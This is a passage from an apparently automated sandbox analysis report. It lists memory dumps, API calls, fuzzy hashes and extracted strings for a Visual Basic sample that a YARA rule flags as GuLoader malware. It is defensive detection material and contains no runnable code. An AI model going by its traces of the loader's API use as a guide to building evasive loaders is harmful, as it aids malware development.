                • Associated: 00000001.00000002.17008506922.0000000000416000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.17008529892.0000000000417000.00000002.00020000.sdmp
                Similarity
                • API ID: __vba$Free$CheckHresult$Move$Error$#532#541#582#593#595#648ChkstkListNew2
                • String ID: 15:15:15$Specting7
                • API String ID: 4146733498-3993399904
                • Opcode ID: f274ec460dbadb6b1d93657b41d762b97ca730fe61a25f82f4289d7592ed1a9d
                • Instruction ID: d38a8d83a9c1057c504a4ba25e2f9f59dac6fdf465b0b5a2e2cab0a640dfe200
                • Opcode Fuzzy Hash: f274ec460dbadb6b1d93657b41d762b97ca730fe61a25f82f4289d7592ed1a9d
                • Instruction Fuzzy Hash: F90216B4901259EFDB10DF90CE88BDDBBB4FF48304F10819AE549A72A0D7785A85CF68
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000001.00000002.17008380650.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.17008341340.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.17008506922.0000000000416000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.17008529892.0000000000417000.00000002.00020000.sdmp
                Similarity
                • API ID: #100
                • String ID: VB5!6&*
                • API String ID: 1341478452-3593831657
                • Opcode ID: 9cf2941e621a69fea955780aa94981640b67aee3367f1cc232f1084aa8b8bf91
                • Instruction ID: 7271d700640d2f78ea57597eab43cff79751428e75609dc4c0b4d2d63b27fc33
                • Opcode Fuzzy Hash: 9cf2941e621a69fea955780aa94981640b67aee3367f1cc232f1084aa8b8bf91
                • Instruction Fuzzy Hash: F101456255E7C05FD30317704C226923FB8AE4326072B40EB9885DA4B3C11D4D4AD7A2
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                APIs
                • #713.MSVBVM60(004141AC,?,?,?,?,?,?,?,?,?,?,?,?,?,00401196), ref: 00414C68
                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401196), ref: 00414C73
                • __vbaStrCmp.MSVBVM60(004141B8,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401196), ref: 00414C7F
                • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401196), ref: 00414C92
                • __vbaRedim.MSVBVM60(00000080,00000002,?,00000002,00000001,00000012,00000000), ref: 00414CB3
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414CDB
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414CEB
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414D17
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414D21
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414D4D
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414D57
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414D83
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414D8D
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414DB9
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414DC3
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414DEF
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414DF9
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414E25
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414E2F
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414E5B
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414E65
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414E91
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414E9B
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414EC7
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414ED1
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414EFD
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414F07
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414F33
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414F3D
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414F69
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414F73
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414F9F
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414FA9
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414FD5
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00414FDF
                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041500B
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00415015
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00415041
                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041504B
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00415077
                • __vbaGenerateBoundsError.MSVBVM60 ref: 00415081
                • __vbaNew2.MSVBVM60(00414150,004162D4), ref: 004150A1
                • __vbaHresultCheckObj.MSVBVM60(00000000,0225004C,0041413C,00000014), ref: 004150CC
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00414160,00000078), ref: 004150F4
                • __vbaFreeObj.MSVBVM60 ref: 004150F9
                • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,0041400C,00000254), ref: 00415122
                • __vbaAryDestruct.MSVBVM60(00000000,?,0041514B), ref: 00415144
                Memory Dump Source
                • Source File: 00000001.00000002.17008380650.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.17008341340.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.17008506922.0000000000416000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.17008529892.0000000000417000.00000002.00020000.sdmp
                Similarity
                • API ID: __vba$BoundsErrorGenerate$CheckHresult$Free$#713DestructMoveNew2Redim
                • String ID:
                • API String ID: 58225848-0
                • Opcode ID: 12e3227d6a4245a3af32bab2ccfd400967f4b750acd3c39f084afda1e9163b3e
                • Instruction ID: fc363acd393d5aa022fa2f9ab18c7f4ca54b23b91a68f0f2775528b7a9f9143f
                • Opcode Fuzzy Hash: 12e3227d6a4245a3af32bab2ccfd400967f4b750acd3c39f084afda1e9163b3e
                • Instruction Fuzzy Hash: 80024A35A0021ACBCB24DFA4C5919FAFBB5BF84314F21416AC9016B790D775ACC7CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041400C,00000114), ref: 00414ABD
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041400C,00000110), ref: 00414AE6
                • #554.MSVBVM60 ref: 00414AF2
                • __vbaNew2.MSVBVM60(00414150,004162D4), ref: 00414B0A
                • __vbaHresultCheckObj.MSVBVM60(00000000,0225004C,0041413C,00000014), ref: 00414B2F
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00414160,000000C0), ref: 00414B55
                • __vbaFreeObj.MSVBVM60 ref: 00414B5A
                • __vbaNew2.MSVBVM60(00414150,004162D4), ref: 00414B72
                • __vbaHresultCheckObj.MSVBVM60(00000000,0225004C,0041413C,00000034), ref: 00414BBC
                • __vbaObjSet.MSVBVM60(?,?), ref: 00414BCD
                • __vbaFreeObj.MSVBVM60(00414BF5), ref: 00414BEE
                Memory Dump Source
                • Source File: 00000001.00000002.17008380650.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.17008341340.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.17008506922.0000000000416000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.17008529892.0000000000417000.00000002.00020000.sdmp
                Similarity
                • API ID: __vba$CheckHresult$FreeNew2$#554
                • String ID:
                • API String ID: 420915087-0
                • Opcode ID: 52d278714c7fb6cf720ae38533a1197d1ce178b9656d84bca0fb7beab39a632c
                • Instruction ID: c6a47f743c172568fe8464088fbbb3d69f298df89f334b5019e92ca07b500883
                • Opcode Fuzzy Hash: 52d278714c7fb6cf720ae38533a1197d1ce178b9656d84bca0fb7beab39a632c
                • Instruction Fuzzy Hash: 0241B671941214ABDB04EF94DD89FDABBB8FF58704F10446AF145B7290D374AD84CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID:
                • String ID: <mY$Y]y$]~hZ$cyJ$n$%^8$-N;$}"=
                • API String ID: 0-3882904252
                • Opcode ID: b26244f33667e4886c0339384d88cdf76be4e7c2ac28b949acd09c218eca0586
                • Instruction ID: 8be3c12626b4f67afa9fe55eed5c3a089a097523ed991df2b1dea1e5869f805a
                • Opcode Fuzzy Hash: b26244f33667e4886c0339384d88cdf76be4e7c2ac28b949acd09c218eca0586
                • Instruction Fuzzy Hash: 7AA25571A0434ADFDB398E38CD957DA37B2BF95340F56812ADC899B284D3709A85CB42
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID: CreateFile
                • String ID: *1-T$*1-T$G^?l$H=$H=$cyJ$q~m
                • API String ID: 823142352-2207524381
                • Opcode ID: 5e1f61e6ad0b91b701dfd030c6b915a95ef2aaf2c8e4652682feb5f4fe049cb8
                • Instruction ID: 9fa1669239d440ea4788b98c0f2b1c25d89d80b16ea362d68df842d50da4f998
                • Opcode Fuzzy Hash: 5e1f61e6ad0b91b701dfd030c6b915a95ef2aaf2c8e4652682feb5f4fe049cb8
                • Instruction Fuzzy Hash: 7502CB71A0834A8FCB3E9E38DD907ED3BA2AF56364F51421EDC4A9B291D7B18541CB43
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID:
                • String ID: 'xf$Y]y$]~hZ$-N;$q~m
                • API String ID: 0-2005616889
                • Opcode ID: 61b0fee129e8ab7044dc136537c97ee253ae8d1e4ec4dbf6e8a86562ce2f3c39
                • Instruction ID: 5f6960323994a77a2fc022536dd0992689ab4a8fa240f72568d621c0202134d8
                • Opcode Fuzzy Hash: 61b0fee129e8ab7044dc136537c97ee253ae8d1e4ec4dbf6e8a86562ce2f3c39
                • Instruction Fuzzy Hash: 01B24471A0434ADFDB399E38CD947EA37B2BF55350F45812EDC899B294D3708A85CB42
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 84469eab5885088885aae564ff2fec76aead27596cc7f91fc4d388742f92d47a
                • Instruction ID: bf4d0a6ef6b70211ce1258131207ab096069c02fa8271febfcb10de8cc3b9d14
                • Opcode Fuzzy Hash: 84469eab5885088885aae564ff2fec76aead27596cc7f91fc4d388742f92d47a
                • Instruction Fuzzy Hash: C5314732B04345DFDB39AE3DD8947EA77A6AF96394F49442EDC8587250D7B04981C702
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtProtectVirtualMemory.NTDLL(-0514B332,?,?,?,?,0110E493,-4E8C1946,011079A2,AC70B8DE), ref: 0110F248
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID:
                • API String ID: 2706961497-0
                • Opcode ID: e16e079fee7d63db083e41b42e63e074c2f2571d5c9a1b7955a42f03a9c818e8
                • Instruction ID: 66ad38e46625603da839b462cbd17710772df0e1d9c55eb9e53335efb91d6286
                • Opcode Fuzzy Hash: e16e079fee7d63db083e41b42e63e074c2f2571d5c9a1b7955a42f03a9c818e8
                • Instruction Fuzzy Hash: 45012CB47012899FDB38CE09DC94BDA72A7AFC9340F54C12DDC0987358C7759A468B15
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID: EnumWindows
                • String ID:
                • API String ID: 1129996299-0
                • Opcode ID: 3df9ce5cf742e0c0d8f7eabca1b51daa51a8a31cd42ef34800a7a615e623099c
                • Instruction ID: b700e3f50c96a40e7a105129449e7a6acfc83ed753534e42ff0c53f8255ac734
                • Opcode Fuzzy Hash: 3df9ce5cf742e0c0d8f7eabca1b51daa51a8a31cd42ef34800a7a615e623099c
                • Instruction Fuzzy Hash: 6171EE72D182C4CFC31FDF34C8593A8BBB1EF1A395B28458DE1958BA92D7714542CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID: EnumWindows
                • String ID:
                • API String ID: 1129996299-0
                • Opcode ID: d5a5acdd1302536fbf53e9262825d9fb80996de864197968d477eb2ea3855b8e
                • Instruction ID: 9ecf793e9092042c8caa7ca816fb339b890f60453c90e039e3536fc5cc3c79d6
                • Opcode Fuzzy Hash: d5a5acdd1302536fbf53e9262825d9fb80996de864197968d477eb2ea3855b8e
                • Instruction Fuzzy Hash: 71010474608284CFC32CDF38C8A56E877A6EF19364F540A1DE9AA8A741DB3155528B4A
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(47563179,7C5A28D7), ref: 0110CF71
                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 16fbb5566daff6bc893a61f75e0da0bdb02e63291982994fed76590481de5889
                • Instruction ID: ecf8d571f0de89c5295889dccc53a7d4e2b50db560e640ad64fac047c95cf084
                • Opcode Fuzzy Hash: 16fbb5566daff6bc893a61f75e0da0bdb02e63291982994fed76590481de5889
                • Instruction Fuzzy Hash: 7701AF746443AA8BCF3D9F299954BFE37A2BF09754F00426DEC2DDB242C7705A048B85
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID: Y]y$]~hZ$cyJ$-N;
                • API String ID: 2706961497-3217645269
                • Opcode ID: f9b71dcfb4f1a1bd50e1c232e534fc0f38243c0976b26f5cfe5dca0194b1e084
                • Instruction ID: 715eb33f5bb6fe417ade90a0c91678e7b0e86e0c43ad17cf8f4b5aa4ac5d43e1
                • Opcode Fuzzy Hash: f9b71dcfb4f1a1bd50e1c232e534fc0f38243c0976b26f5cfe5dca0194b1e084
                • Instruction Fuzzy Hash: A9D24971A0838ADFDF399F38CD947DA7BA2AF56350F45812ECC898B295D3708645CB12
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID:
                • String ID: Vv+$Y]y$]~hZ$-N;
                • API String ID: 0-289095028
                • Opcode ID: c7c2ddbd3b1f48cc86712116a85fc01f5907f8c9a5a4ee6a1a8a4794b5ccaaab
                • Instruction ID: 2e6d207cf96f6c7330ce73ba6101eb4e0428f9bfef9a5b04203f85f80578041b
                • Opcode Fuzzy Hash: c7c2ddbd3b1f48cc86712116a85fc01f5907f8c9a5a4ee6a1a8a4794b5ccaaab
                • Instruction Fuzzy Hash: 3E826671A0434A9FDB398E34CD947EA7BB2FF95340F55812EDC899B294D3708A85CB42
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID:
                • String ID: Y]y$]~hZ$-N;
                • API String ID: 0-3128308444
                • Opcode ID: ad1e7c36e2cafc0bdaabea8cb1f78654aea14d89b5db9d275af0b1ee79a5765b
                • Instruction ID: 7c4fbc66ccb9e34c447edf6970779bfcaafa2dc54e0f0f5624fe1dd6dbd105c2
                • Opcode Fuzzy Hash: ad1e7c36e2cafc0bdaabea8cb1f78654aea14d89b5db9d275af0b1ee79a5765b
                • Instruction Fuzzy Hash: AA725671A0434ADFDB398E38CD943DA77B2FF95340F56812ADC899B294D3709A81CB42
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID:
                • String ID: cyJ
                • API String ID: 0-1274678379
                • Opcode ID: feb02486a419e81f43bf8d2324bb351af28e8b3c61a74e39f477266e4fb77fdf
                • Instruction ID: cd61fa31a5237486caebf365de9dd8d7589b8366481d5a67267fd9e66e17de60
                • Opcode Fuzzy Hash: feb02486a419e81f43bf8d2324bb351af28e8b3c61a74e39f477266e4fb77fdf
                • Instruction Fuzzy Hash: 6C310871605709CFCF39DDB88AA53EB37B2AF62390F45822DDC8ADA585D7744642CA03
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0a0225544f4d5cbf059343f815869d03da915f54d8d88471a92441b2e4e05fd1
                • Instruction ID: 29a3d57e99f213e71a66deaf3a1927c02ad9f34efe97c67d7b40b09cc1ec0254
                • Opcode Fuzzy Hash: 0a0225544f4d5cbf059343f815869d03da915f54d8d88471a92441b2e4e05fd1
                • Instruction Fuzzy Hash: DB51E475A447498FEB79CE29CED57D637E2BF58740F45811ACE8D8B284E3707A018B02
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c0dee29967799a3fe64a9dca94bd6fed3870415dde6aad03530d0a186484adc
                • Instruction ID: 749c7d10931a6fa8ad9569da584f0a32612140ed276fcac2c86b84abe007ac0d
                • Opcode Fuzzy Hash: 0c0dee29967799a3fe64a9dca94bd6fed3870415dde6aad03530d0a186484adc
                • Instruction Fuzzy Hash: 21212675A45249DFE7645E388C403EB73E6AF04740F96851ADCC9DA2D4E3348584CB13
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 532627bb337d437bb4c529cc30027b4b5b2c654fc9448befd084a2f8477a442a
                • Instruction ID: 601370543aadb0df1729daa21a7983b3974e090d7067c14456c519f8abb91eaf
                • Opcode Fuzzy Hash: 532627bb337d437bb4c529cc30027b4b5b2c654fc9448befd084a2f8477a442a
                • Instruction Fuzzy Hash: A511C275A05644CFCB29CEACD994BDD37A1EF9A360F02422ADC098B6D4D331AA42CB01
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 44202390e309ae21ad760f9fc66ffa83febc4e578202b7def74869fc104efc40
                • Instruction ID: 51c94ec96a3b809159e9e938ab4fb11186e8de11cdd8ec00b69405b553961650
                • Opcode Fuzzy Hash: 44202390e309ae21ad760f9fc66ffa83febc4e578202b7def74869fc104efc40
                • Instruction Fuzzy Hash: 38C092B62016C18FFB41DF08C691B4173B0FF11AC8B280494E483DF612D328E900CA00
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                Yara matches
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                Uniqueness

                Uniqueness Score: -1.00%